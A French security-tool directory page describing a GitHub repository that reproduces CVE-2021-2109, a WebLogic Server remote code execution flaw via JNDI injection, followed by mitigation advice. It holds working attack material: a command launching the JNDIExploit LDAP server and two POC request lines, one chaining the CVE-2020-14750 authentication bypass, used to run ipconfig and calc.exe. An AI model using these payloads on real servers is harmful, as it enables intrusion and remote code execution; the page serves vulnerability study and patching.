Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2021-2109 — Reproduction et analyse étape par étape de CVE-2021-2109, une vulnérabilité d'exécution de code à distance du serveur Weblogic via une injection JNDI, avec POC et conseils d'atténuation. | Kitploit
Outils/GitHubGitHub/rabbitsafe/cve-2021-2109
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationLabs et Pratique
GitHubrabbitsafe/cve-2021-2109

CVE-2021-2109

Reproduction et analyse étape par étape de CVE-2021-2109, une vulnérabilité d'exécution de code à distance du serveur Weblogic via une injection JNDI, avec POC et conseils d'atténuation.

Voir le dépôt
95il y a 5 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Reproduction et analyse de la vulnérabilité d'exécution de code à distance CVE-2021-2109 Weblogic Server

En janvier 2021, Oracle a publié des correctifs de sécurité, incluant 329 nouveaux correctifs de sécurité dans la gamme de produits Oracle. Ce communiqué mentionne particulièrement l'avis de sécurité Oracle WebLogic Server concernant la vulnérabilité CVE-2020-14750, publié le 1er novembre 2020. Il est fortement recommandé aux clients d'appliquer cette mise à jour de correctif ainsi que les autres correctifs de cet avis. La vulnérabilité CVE-2021-2109 est une vulnérabilité d'exécution de code à distance de Weblogic. Elle est principalement due à une injection JNDI, permettant à un attaquant d'exécuter du code à distance via cette vulnérabilité.

Versions concernées : Weblogic Server 10.3.6.0.0 Weblogic Server 12.1.3.0.0 Weblogic Server 12.2.1.3.0 Weblogic Server 12.2.1.4.0 Weblogic Server 14.1.1.0.0

I. Reproduction de la vulnérabilité d'exécution de code à distance CVE-2021-2109 Weblogic Server

Utilisez DOCKER pour construire un environnement de test Weblogic Server, Weblogic Server est accessible normalement. image

  1. Effectuer une injection JNDI en étant connecté à l'interface d'administration

Premier cas : il est nécessaire de se connecter à l'interface d'administration du Weblogic Server avec un compte administrateur, de capturer le paquet de connexion via BurpSuite et d'obtenir les données du cookie de connexion.

image

Lancez LDAP localement, téléchargeable sur https://github.com/feihong-cs/JNDIExploit/releases/tag/v.1.11, la commande est la suivante : java -jar JNDIExploit-v1.11.jar -i 192.168.131.1

image

Envoyez le paquet de données POC d'injection JNDI pour la vulnérabilité d'exécution de code à distance CVE-2021-2109 Weblogic Server : POST /console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.131;1:1389/Basic/WeblogicEcho;AdminServer%22) HTTP/1.1

image

Exécutez la commande système ipconfig via la variable cmd.

image

  1. Effectuer une injection JNDI en combinant avec l'accès non autorisé à l'interface d'administration de Weblogic Server

Deuxième cas : pas besoin de se connecter à l'interface d'administration de Weblogic Server.

Il est nécessaire de combiner avec la vulnérabilité d'accès non autorisé CVE-2020-14750 de Weblogic Server, et d'envoyer le paquet de données POC d'injection JNDI pour la vulnérabilité d'exécution de code à distance CVE-2021-2109 Weblogic Server : POST /console/css/%25%32%65%25%32%65%25%32%66/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&cqqhandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.131;1:1389/Basic/WeblogicEcho;AdminServer%22) HTTP/1.1

image

Exécutez calc.exe via la variable cmd pour ouvrir la calculatrice système.

image

image

La calculatrice système est ouverte.

image

II. Recommandations de sécurité pour la vulnérabilité d'exécution de code à distance CVE-2021-2109 Weblogic Server

  1. Désactiver le protocole T3

Si vous ne dépendez pas du protocole T3 pour la communication JVM, vous pouvez atténuer l'impact de cette vulnérabilité en bloquant temporairement le protocole T3.

1). Accédez à la console Weblogic, dans la page de configuration de base_domain, allez dans l'onglet 'Sécurité', cliquez sur 'Filtre' et configurez le filtre.

2). Saisissez dans le filtre de connexion : weblogic.security.net.ConnectionFilterImpl, et dans la boîte de règles du filtre de connexion, saisissez : * * 7001 deny t3 t3s.

  1. Désactiver IIOP

Connectez-vous à la console Weblogic, trouvez l'option Activer IIOP, décochez-la, redémarrez pour appliquer.

  1. Fermer temporairement l'accès externe à /console/console.portal

  2. Mettre à jour avec le correctif de sécurité officiel

Télécharger l’outil